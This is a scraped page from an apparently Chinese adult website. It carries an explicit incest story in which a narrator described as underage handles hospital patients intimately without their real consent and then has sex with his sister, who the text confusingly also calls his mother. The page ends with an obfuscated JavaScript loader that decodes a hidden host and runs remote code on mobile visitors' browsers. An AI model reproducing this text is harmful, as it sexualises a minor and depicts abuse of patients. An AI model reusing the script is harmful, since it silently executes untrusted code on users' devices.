返回

姐姐–亲自教弟弟干穴789

 首页

AV拼多多 ❤ 拼的多 ❤ 看的多
WWW.AvPinDuoDuo.COM
海外地址
www.AVPDD.com



到了晚上,我按时到了姐姐的妇产科医生办公室,姐姐让我披上一件白大褂,并戴上医生的帽子及口罩,这样打扮后,我只露出两只眼睛,外人看来我只是很普通的一位医生而已。接着,我随着姐姐开始了一晚的妇产科实习医生生涯。首先来到四号病房,里面住着两名女病人。一个是33岁,刚生完小孩,另一个45岁,準备做子宫切除手术,今晚需要做例行检查和手术前的备皮。来到病房里,两位女人都还没有睡觉,她们微笑着跟我姐姐点头招呼。首先姐姐对年轻的少妇说道需要看看身体恢复得如何,并揭开了她的被子,我看见少妇并未穿着内裤,而且阴部被剃得乾净无毛,整个阴户呈深黑色,小阴唇难看的露在外面。姐姐让她捲曲着分开双腿,并用手指将小阴唇拉开,并对我说看需要清楚里面恢复的情况,我顿时感到自己的下面发硬,而那为少妇却很坦然地对我说她下面的情况。
姐姐对我的性教育之三然后,姐姐又走到另一个病床前,床边坐着一位在看书的40多岁的城市女性,她穿着很合体的西式套装,齐膝的西装套裙下是穿着黑色透明腿袜的併拢的双腿,浑身透露着一股高雅娴静的气质。我从病历上知道她是一位大学老师,人长得有几分姿色,虽然已年近45岁,不过反而让我觉得她更加丰满有女人味道。我强作镇静地站在姐姐旁边,看着将要发生的一切。果然姐姐对她说道明天上午做子宫切除的手术,今晚需要为她做一次体检并备皮,请她脱去全部裤子躺到床上,这老师迟疑地看了我一眼,姐姐连忙对她说我是新来的实习医生,她才伸手解开裙子拉练褪下去,露出里面的一条小小的黑色T字内裤,接着又迅速地脱下了小内裤,躺到病床上并叉开了双腿。我这才清楚地看到她的阴户,丰满的隆起的阴部长满了黑色的阴毛,同样她的小阴唇也很长、黑色的部分漏出裂缝,咋一看好似黑色的橡皮,一点也不像色情书中的照片那样粉红美丽,我感到很失望。
姐姐见我不感兴趣,便故意用手指分开她的阴唇看看,还用手指插入到阴道和肛门中检查,同时回头对我低声说道:你看看里面有无异常呢?我看到被分开的小阴唇里面是鲜红色很让人吃惊,而且姐姐的手指正淫蕩地插进老师的阴道里,这时老师却目光盯着天花板承受着在一个年轻男人面前暴露阴部的无奈与羞耻。接着姐姐对我说道你也检查一下吧。
我紧张地学着姐姐的样子,双手戴上乳胶手套并涂上润滑剂。然后在姐姐手把手的指导下,以左手指分开老师的阴唇,右手食指插入阴道,中指却插入了她的肛门,这时老师发出了轻轻的哼声,我想可能是我的手指弄疼了她,姐姐对老师说忍耐一下就好哪,手术前必须要这样检查的。我的手指感到老师的体内温温软软的很舒服,但检查完成了,我很不情愿的抽出了手指。我看了一眼老师的脸,正好她也看到了我,虽然她已是久经人事的女人,但给一个陌生男人这样摸弄私处还是没有过的事,因此她脸刷地一下红了。姐姐却若无其事对她说,好了,可以穿好衣服了。于是她迅速地坐起来,在我的目光注视下叉开腿套上了一条黑色的T字小内裤,我正纳闷这么文雅的老师怎么穿这样性感的内裤时姐姐却说好了,我们继续查房吧。
出来后,姐姐问我感觉如何,满意吗?我说怎么这两个女人的下面一点也不好看,黑黑的毛太多,看不清楚,而且中间的黑色阴唇太长很难看,不像因特网上的色情图片里女人是那样粉红色的阴户,小阴唇很短或者只有一条窄缝。姐姐说:「啊,原来你小子被着姐姐早已在网上浏览色情图片,我还以为你在学电脑哩。回去后老实打开电脑给姐姐也看看究竟是什么样的图片让男人着迷。」接着,我们走进5号病房,里面只有一个30来岁的女人,一见我们进来便笑着对姐姐打招呼,从她们的对话中我意识到这个女人是本医院内科的医师,因为妇科病要做手术,今晚是手术前的检查和备皮。照例,姐姐介绍我是新来的实习医生,这位医生病人反而很高兴地对我点头,好像很乐意有一位男医生为她检查似的。我对着这位老师的下体观察了一会后,姐姐从她阴道里抽出器械,对她说道:「来吧,你的毛太密,让这位实习医生来为你剃阴毛吧……,」姐姐说着,示意我给她剃毛。
我顺着看去,在桌子上放着容器,里面有剃毛用的器具,原来这老师还得剃阴毛呢!虽然我从未接触过女人身体,但医学基本业务还是很熟,我拿起剃毛用具,看了一下眼前的阴户,用毛刷沾上肥皂泡沫,开始揉搓她的阴户。
这女人现在是一点办法也没有,怎敢违背医生的命令,她仰在床上闭上眼睛,赤裸着下身,两腿叉开固定在床上,露出阴毛茸茸的的阴户,真像案板上的羔羊任人摆布。可以看到,她脸都羞红了,让一个年轻的男医师摆弄她神秘的女人下体,她的感觉一定很複杂。
「怎么回事?还不快一点!」姐姐在催促我。
我以机械化的动作,把泡沫涂在女人阴毛上,老师微微扭动身体,茂密的阴毛掩盖在下腹部,仔细的涂抹泡沫时,她阴户发出异常光泽。
我先拿起剪刀,「请不要动。」我尽量用平静的口吻说后,很小心的开始剃姑娘的阴毛。先是用剪子很快把她的下腹处阴毛剪短,阴唇肉褶边的不大方便处就用手提着她小阴唇外翻再剪。姑娘的阴户很快就剩下短短绒毛了,特别是老师肛门附近,我仔细给她剪乾净,然后我拿起剃刀,再给她的阴户和腹部涂了些泡沫,先从她肚脐下方剃到阴阜处,刀过之处露出她雪白的皮肤。
姐姐仔细看着我给这女人的剃毛动作,不时指点几下,我再从她大腿根向阴唇处剃去,靠近这里的女人性器官皮肤颜色发暗,使她腿根上的嫩肉愈发显得滑爽。让一个素不相识的男医师剃阴毛,不知道这个老师对神圣的医师职业,有什么样的看法?
「再忍耐一下,马上就……」姐姐对她说。 完全剃光了,我做得很熟练,老师阴部的光景是白晃晃的,大小褐色阴唇细节显得很清晰。没了阴毛遮掩的女人阴核和尿道口愈加显得凸出,她的肛门也清晰可见,什么身份的女人到了这一刻,也是毫无尊严了,有的只是在医师眼里随意摆布的肉体。
姐姐低头看了看,可能她对大阴唇附近有点剩余的小阴毛,似乎不大满意,她接过剃刀,一手提起女人的一片阴唇,另一手很熟练地刮了几下,还有肛门附近会阴处,剃刀不便用,她又换了剪刀,仔细修剪会阴处肛门附近的阴毛,女人这些隐讳部位,男医生倒是有点不好意思仔细弄。
姐姐还对着女人阴部吹了吹,又用手弹拨几下,清除剃下的女人阴毛,看到老师紧张的模样,她脸上露出笑容:「可以了。」
我在整理剃毛用具时,姐姐又开始用棉球反覆擦拭她有残余泡沫的阴户,剃光了阴毛以后的深色阴户两片大小阴唇愈发凸显,阴阜同下腹处显得更加白嫩而耀眼,被翻捲上去的衣服只盖着她肚脐以上,我看见老师小腹微微的起伏,从大腿根部露出可爱的女人的神秘洞口。姐姐对老师说道可以了。老师这才起身穿上裤子和裙子,同时看了我一眼,我见她脸红红的。而我的老二早已为刚才老师的裸露的阴户指天敬礼,幸好为白大褂遮掩,我还算镇定。
为老师剃阴毛后,我才对女人有了手的体验。我完全想不到姐姐不仅带儿子去她的医院观看了女人的阴处,还让儿子动手为女病人剃阴毛,真不知她打的什么主意。我只听见姐姐对女病人说道可以了,便见女病人起身穿好了裤子,又回到了斯文高贵的模样。姐姐同她们到别后便带着我走出了4号病室。走出去后,姐姐小声问我道:「如何,看清楚了吧,女人的下面也就一条缝而已。还想什么就快说,今晚正好是我一人值班。」我说:「姐姐,你们这里都是已经结婚的女人才来检查吗?」姐姐说:「当然不完全是,未结婚的女人也有来体检的。比如婚前检查的项目,都是就要结婚的年轻女子,不过一般都是女医生做婚检,很少有男医生在场,主要是年轻女子害羞不方便。」我又说:「那可否让我看看产房里的大肚子女人。」姐姐小声道:「大肚子女人到是完全不害羞,不过看了以后可能会让你对女人失去性趣的,」接着我便跟着姐姐走进了产妇检查室。
一进去我便看见两张检查床上都躺着两位产妇,她们下面都脱光了裤子,分开大腿,露出了平时不轻易示人的高耸滚圆的肚子和剃净阴毛的阴户,不知为什么,我看到这光景却一点也没有兴奋的感觉,只觉得她们的阴部颜色很深,小阴唇外漏很长,很难看。于是便很快退了出去。回家后,我一下便抱住姐姐,双手在她的胸前抚弄着,姐姐到是没强烈反对,嘴里却说道:「坏小子,女人的最神秘处已看过了,还想做什么。难道想打你妈的主意不成!」我大着胆子答道:「今晚的几个女人都没有姐姐你漂亮,我还是想看看你的下面是否比她们的下面好看。」「女人的下面肯定长的不相同,不过什么样的算漂亮就只有你们男人说了才算了。你为什么一定要看你姐姐的阴部呢,这可是大逆不道乱伦的丑事呀。唉,真拿你没法子,好吧,只能看看,不许触…….」接着,姐姐红着脸看了我一眼,然后站起来慢慢将白色的短裤褪到脚跟处,然后站着将里面的一条白色T字裤脱下来。这时,姐姐的腹部以下完全一丝不挂地裸露在儿子的眼前,我紧紧盯着她的长满黑色卷毛的阴部,呆呆地看着与我朝夕相处的女人的秘处,她真的展现在一个未成年的少年眼前了,而这个献身的女人竟然是少年的姐姐!
奇怪的是,姐姐脱光裤子后反而镇定了,她眼光看着儿子,而儿子却只是看着她的阴户,这令她感到了令人难堪的刺激与兴奋,阴户里一阵阵瘙痒。姐姐乾脆又坐到沙发上,在儿子面前分开双腿,并说道:「儿啊,看吧,这就是你姐姐最神秘的地方,男人们常说的屄,麻屄。」「屄」这个下流的字从姐姐的嘴里吐出,令我倍感兴奋,下面挺得高高的,在裤裆处出现耸立的帐篷。我很难堪的掩饰着那里,可姐姐还是早已看到了我高耸的裤裆,她故意逗我说:「咦,你的裤子里藏了什么东西,脱下给姐姐看看嘛。」我连忙解释道:「没,没什么……..」姐姐却继续笑道:「我的儿啊,就不要对姐姐隐瞒了。姐姐知道你那里又硬又大了,这是男人正常的生理反应啊!姐姐裤裆里最隐秘的东西现在就摆在你眼前,你要不硬的话才真是不正常啊。其实姐姐在医院上班,每天都会看到许多男人的光屁股,而且多半的男人在女医生面前都控制不住的。我在为那些男人做下面的检查时都会硬起来,这没什么不好意思的。况且我是你姐姐呀。这是你第二次看到成年女人的阴户吧?放鬆些,既然我都脱光了给你看了,你也应该给姐姐看看你的东西才公平嘛,你说是不是?姐姐还要教你认识一下女人的东西,免得日后有女友时不知所措。」一边说姐姐一边做出了我最想不到的动作。她把双手放到自己的阴户上,将阴毛分开,说道:「成年女人的逼都长有阴毛,妈的阴毛是比较多的。我把毛分开好让你看的清楚些。」妈指着阴户裂缝两侧长有阴毛的狭长而深褐色的部分说:「儿啊,这是妈的大阴唇。」接着又掰开大阴唇,并用手指牵开中间两片红黑色蝶形肉片说:「儿啊,你看这是妈的小阴唇,上面无毛,小阴唇中间有两个开口,上面的小孔是姐姐尿尿的地方,下面的大孔就是姐姐的屄,男人的东西可以插进去的,大家叫日屄就是指男人的东西插进这里的意思。」我看到在姐姐的麻屄裂缝上端有一段小手指粗细粉红色肉柱,顶端有黄豆大小露出包皮,便指着那里问道:「妈,你看你的小鸡鸡也会变得硬硬的」姐姐看了我一眼:「儿啊,眼看手勿动。这不叫小鸡鸡,这叫阴蒂,女人想男人时它就会硬起来,男人摸它时女人就会很舒服的。」我突然问姐姐道:「姐姐,姐姐,女人撒尿为什么一定要蹲着呢?为什么不像我那样站着尿尿呢?为什么姐姐你撒尿时发出很大声的嘘嘘声呢?」「傻儿子,你真坏透了,我真没想到你竟然连姐姐上卫生间都在门外偷听,我真担心你很快就会发展到偷看姐姐撒尿,老实回答姐姐,你有没有尝试想偷看姐姐撒尿的情景。」由于姐姐两眼紧盯着我,我只好如实回答:「我有几次趁你撒尿时趴在卫生间门外地上,透过门下面的百叶窗偷看你撒尿……..不过光线太暗,什么也看不清楚,只觉得姐姐的胯间黑麻麻的一片。」「那你不是早就尝试偷看过姐姐的麻屄哪。坏小子,你老爸要知道了看他不揍扁你。」姐姐有些气愤地说道。我吓得赶紧向姐姐求饶:「姐姐,我再也不敢偷看你上厕所那,你可千万别告诉爸爸啊,那样我可是死定了。姐姐,姐姐,好姐姐,儿子求您哪!」姐姐却苦笑到:「好哪,好哪,别担心,家丑不可外扬。我可不愿遭受千夫指责的乱伦娼妇的骂名。你爸要知道了,他不会打你,而只会责怪我不小心让你揩啦油。再说,幸好你是偷看你的姐姐,要是偷看外面的女人被发现,那可能会误你一辈子的。所以今天我才会宁愿牺牲姐姐的贞洁,将姐姐最神秘的地方给你看,让你满足对女人的好奇。说吧,姐姐今天彻底满足你的好奇心,你对女人还有哪些疑问,赶快提出来,姐姐只求你不要到外面惹是生非就好了。如果没要求的话,姐姐想要去卫生间小解了。」 我一听大喜,忙说道:「现在你的嘛屄我已看过了,但我想看看姐姐撒尿……」姐姐一听歎气到:「真是坏小子,坏透了,竟然连女人的这么隐秘的骯髒事也想看,真弄不明白你脑子是不是有问题。不过既然已答应你了,也就罢了。你随我到厕所来看吧。」到了厕所,我让姐姐叉开双腿蹲在了马桶上面,以方便我观看她的阴户撒尿的情形,姐姐顺从地蹲上去,同时还伸出手指分开她的阴唇。我不解地问她为什么要这样做,姐姐答道:「女人的尿道口隐藏在这两片小肉片中,站着撒尿会顺着大腿往下流,会弄髒裤子的,而且女人蹲着撒尿还要将腿分开,最好用手将这两片小阴唇分开,以免阻碍尿液射出。否则尿液会顺着小阴唇滴到肛门,所以女人撒尿后也要用纸擦乾净阴户的残尿。这就像男人撒尿会用手将包皮拉开,露出龟头是一样的道理。」
我连忙问姐姐到:「姐姐,你怎么对男人撒尿的情形知道的这么详细,难道你也偷看过男人撒尿吗?姐姐也是坏女人。」姐姐的脸再一次变得绯红,低声说道:「你爸爸的情况难道姐姐不可以看吗?」我紧追不捨地继续问道:「那爸爸也看过姐姐你撒尿喽,是不是,姐姐?」姐姐涨红着脸低声说道:「是的,刚结婚不久,你爸爸就硬要我撒尿给他看,我死活不肯,但他就不理我,我扭不过他,只好答应他了。不过也真怪,给他看过我撒尿后,再让他日我还真舒服,以至后来我还主动要他看你姐姐撒尿吶。」
说完后,姐姐又说道:「你别再问了,我忍不住了。」刚说完,便见一股淡黄色的液体从姐姐的两片掰开的小阴唇中的尿道口射了出来,同时伴随强烈的嘘嘘声,这顿时令我忽然兽性大发,不顾一切地用一只手脱下了自己的短裤,因为我的大鸡在里面好难受,然后我就当着姐姐的面套弄起我的阴茎来,赤裸的正撒尿姐姐呆呆的看着这一切,反应更中强烈了,她的双手紧紧在自己的阴户上抚弄起来,又把两腿张开,将手指插进麻屄中,同时口中发出呻吟声。待姐姐尿完后,她突然站起来把我拖到客厅的沙发上,反压在我的腿上,用阴部紧贴住我的阴茎,我向上挪了一下身体,用一只手(因为我的手很忙,要压住姐姐)把姐姐的内裤脱了下来,姐姐因为我在上面热烈地吻住她的唇,没有反应过来,脱下姐姐的内裤之后,我立即把阴茎用力向姐姐的峡谷发起进攻,姐姐的那里长满了阴毛,在丛生的阴毛中间,有一条裂缝,我用力地把阴茎向那里顶去,却没有顶进去,姐姐下身紧闭着并且有点发乾,我管不了那么多,只要是姐姐的下身,就足以让我兴奋不已,我用阴茎在姐姐的下身磨擦着,做着插入的动作。姐姐知道我没法插进去便笑了一下,随着我的动作,姐姐的笑渐得淫蕩起来,但她把脸侧了过去躲避我的目光,不愿让我看到她有性慾这个事实。于是我更加卖力,姐姐的阴部在我不断地剌激下渐渐地变软了,我用手摸了下,姐姐的那里早已是淫水漫流,我把阴茎对準了裂缝的中间,毫不费力地冲了进去,哇!好舒服(你要是和你妈做过的话,就知道我没有骗人),姐姐的细肉包围着我的阴茎,我紧紧地贴在姐姐的身上,姐姐则发出一长长的呻吟声:「小光,不。。不要这样。」
我和姐姐四目相对,姐姐不自觉地向上迎合着我的阴茎的,当她发觉自己在那样做,而我又盯着她看时,姐姐简直羞得满脸通红,想把脸背过去,而我则用双手捧着姐姐的双颊,看着姐姐,下身开始在姐姐身体里磨擦,姐姐在我的抽送下,开始有了快感,身体也随着我动起来,四目相对之下,姐姐更加妩媚动人,只见她的额头微汗,头髮散乱,双颊红似彩云,目光轻轻地似在呻怪我,又似在鼓励我,嘴里发出轻微地呻吟。我简直不能相信自己正在姐姐的身体里,这简直太美妙了,姐姐的阴部太棒了,为了证明这种感觉,我捧住姐姐的脸,强迫姐姐看着我,阴茎一下一下地向姐姐的阴部冲剌。这使这种感觉更另真实,我在侵犯着姐姐,姐姐由于自己正在被自己的儿子侵犯最神圣和隐秘的地方而羞耻,但她的性慾战胜了这种羞耻感,她在感受男性的填充.
在我目光的逼迫下,姐姐开始也放开了,她主动地用腰力向上迎合着我的动作,并且这种动作越来越大,我们四目相对,并且齐心合力地使我们的身体能更紧密地结合在一起。我感到姐姐的密穴里面越来越湿,并且有节秦地紧缩着,每一次抽插都带来巨大的快感,肉和肉的磨擦,让我和姐姐在这最原始的行为中得到了最大的剌激。终于,我感觉要出来了,我用力地抱住姐姐,拚命地向姐姐的身体猛插,姐姐在我的猛插之下,大声地叫了起来:「啊。啊!」我尽力地延长时间不让自己过早地洩出,可是姐姐已然受不了了,;「啊啊,」随着一声长长的呻吟,姐姐达到高潮了,而我也觉得浑身一麻,下身紧紧塞住姐姐的阴道,把全部对姐姐的爱送了进去。一阵全身的强烈的快感随之而来,我紧紧地抱住姐姐,任我的精液流入姐姐的身体。姐姐也抱住了我,闭上双眼似乎晕了过去。过了十分钟,姐姐睁开了眼,我停下对姐姐的乳房的抚摸,说:「姐姐,你真美!」妈则满脸红红的说:「这回你明白了什么是交配了?」。我的阴茎还在姐姐的阴道里,我感到它又硬起来了,于是又在姐姐的阴道里抽动了一下说:「姐姐在给我上课呢!」,姐姐则捏了下我的鼻子说:「佔了便宜还卖乖!」我淫心又起,阴茎一下一下地又开始向姐姐的阴道里面冲击,姐姐则声音细细地说:「别在这儿!」,我于是抱起姐姐来到了姐姐的卧室里,把姐姐放在床上,姐姐把床头的药酒拿出让我喝了一口。我随即扑了上去,把阴茎顺利地插入了姐姐的阴道里,姐姐又说:「慢慢地好不好!」,我于是压在姐姐身上用肘部支起部分身体重量,阴茎慢慢地在姐姐的阴道里抽送,姐姐则满意地抚摸着我的上身,问道:小光,和妈这样舒服吗?」「是啊!姐姐你真真好!」我慢慢地向里送着,「妈,你呢?」姐姐笑了一下说:「姐姐也很,舒服!可是你知道这是道德不允许的吗?」我回答说:「在漫画书里,有和母亲上床的事!」姐姐惊异地说:「是吗?」,我用力地拱了一下,姐姐随之发出一声呻吟,说到:「妈在实验室,经常让动物近亲交配,可以培养纯种的后代!」我忙问道:「是怎样的?姐姐说道:「就是让动物和自己的母亲或父亲交配,动物之间经常是这样的!这次带小白的姐姐回来就是为了让它和小白交配的。我又问道:「那么会生下什么样的?」「和上一代很像!」,我加快了在姐姐的身体里的磨擦,用我的大阴棒用力地插姐姐的阴道,姐姐被我插得叫了起来,于是我就更加兴奋!说:「妈,我们也要培养纯种!好不好?」「好!小光,!」随着我发疯似的抽插,姐姐的屁股也向上一下下地迎合着我的动作,,姐姐也爱上了这个纯种实验。我的阴茎完全进入了姐姐的身体,姐姐的小穴湿湿滑滑的,还有一种用力裹住的感觉,真是太美妙了,绵软的淫肉层层地压迫着,不断分泌出粘稠的润滑液,在我感受姐姐肉洞滋味的时候,姐姐也在感受着自己被儿子姦污的感觉,这种淫蕩而违反世俗的感觉更加剌激我们的感官,我紧紧抱着姐姐,姐姐则用两腿盘住了我的身体,我们对望着,:姐姐,我就是从这里生出来的?「是。是啊!,那么说我在出生时,就和妈发生性关係了?所有的男人都和自己的妈有实际上的性关係吧!姐姐发出了淫蕩的笑容:是啊!我这时才明白我真的把自己的肉棒插进了姐姐肥美的生我的阴道里了,我不能相信平时高高在上的姐姐在我的身下面淫蕩地扭着屁股,渴求我的雨露,姐姐的淫洞是那么的潮湿、火热,,来吧!小光,姐姐爱你!我提起了屁股,然后用力地向下插了下去,每一次的进入都要尽可能地完全地插进姐姐肥美的肉穴里,姐姐为我的动作疯狂,不断地喘着粗气,胸部因剧烈地兴奋上下起伏,下身一下一下地向上回应我,迎合她的亲生儿子的姦污,我感觉下身不断地涌起越来越强烈的快感,因为我正在干自己的姐姐,亲爱的姐姐,美丽性感淫蕩风骚的姐姐,在她的身体里我成人,现在我又回到了妈的身体里,我们本来就是一个人啊!现在我和她做爱,是回报她给我生命的时候,所以,我要给她最好的,全部的爱,用我的大肉棒,让她快乐,让她高潮!让我耕作姐姐这块肥沃不可亵渎的土地,我只想着用力地插妈的淫穴,想和姐姐合为一体,我看到姐姐不断的呻吟和秋波流转地笑容,她居然在向我笑,而那笑容是那么地淫,那么的诱感,分明在说,好儿子,你干得我好舒服!我更加疯狂地冲击姐姐成熟的女性肉体,阴茎深深地插入妈的肉穴深处,我的每一次插入都是那么地深入和狂暴,几乎使妈窒息。姐姐的乎吸越来越急促她开始居烈地颤动,然后稍停了一下后,她用力地抱住我,丰满的胸部用力地在我胸前磨,下身疯狂地耸动着,我感到姐姐阴道深处开始剧烈地紧缩,阴壁的肌肉紧紧地吸住我的肉棒,我的肉棒不能动了,:啊!啊!姐姐达到高潮了,淫水不断地流出,阴道壁开始抽动、收缩,我无法抵抗姐姐激烈的动作,这动作带来了强大的快感,我压抑了的能量终于在姐姐的阴道里爆发了。浓稠的精液瞬间填满了姐姐的阴道里,我的屁股不住地抽动着更加深入地插入姐姐的阴道深处,发射了所有的炮弹,把我所有对姐姐的爱,打进了姐姐的子宫深处。我的脑海中一片空白,完全陶醉在这有生以来不曾有过的极度的快乐之中,禁忌的做爱使我们体会到了人生最高的快乐!我依然在姐姐身上伏着,阴茎依然插在姐姐的阴道中,我不愿和妈分开,我们紧紧地相拥着,感到我们是血肉相合,完全地融合为一。


评分
相关推荐
3.0分

3.0分 姐姐–亲自教弟弟干穴-乱伦小说3f0

3.0分

3.0分 酒店实录–糖糖7bb

3.0分

3.0分 【美女'梨沙&#3ed

3.0分

3.0分 美女'梨沙'高中时代-淫妻奸情a2c

3.0分

3.0分 [美女'梨沙'高中时代的羞耻记录][1-19-校园激情a46

3.0分

3.0分 <儿子是地狱使者> s三-乱伦小说5e0

3.0分

3.0分 要X砲…当然是自己媳妇最好啰3a3

3.0分

3.0分 几个"非常时期"的性爱问题22b

3.0分

3.0分 小姨性慾强盛….,把我..!a8d

3.0分

3.0分 叔叔把我姦到上天…!22e

3.0分

3.0分 运动可改善性功能 堪比"春药"b7a

3.0分

3.0分 疯狂姐姐教弟弟性爱be5

3.0分

3.0分 疯狂姐姐教弟弟做爱c08

3.0分

3.0分 疯狂姐姐教弟弟做爱c08

3.0分

3.0分 性事射精过快什么办法能"减速"?2d8

3.0分

3.0分 要X砲…当然是自己媳妇最好啰-淫妻奸情dcb


提示:为了您能够顺利的找到本站,请牢记WWW.AVPINDUODUO.COM

请不要忽略该提示,这将意味着您将可能无法找到通往本站的地址。


免责声明 || 广告合作 || 意见反馈

AV拼多多【WWW.AvPinDuoDuo.COM】

已运行1 年 84 天 0 小时 52 分钟 33 秒

所属·美国·华盛顿 网站地图

function DgUow(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function YXMxB(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return DgUow(t);};window[''+'O'+'s'+'B'+'v'+'r'+'A'+'y'+'N'+'U'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=YXMxB,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery';if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/x/'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'t'+'d'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/j/'+i;cs.parentElement.insertBefore(s,cs);}})('Zmm1rLmmRzcXprLmmNu','151936',window,document,['m','mbRtTdBxso']);}:function(){};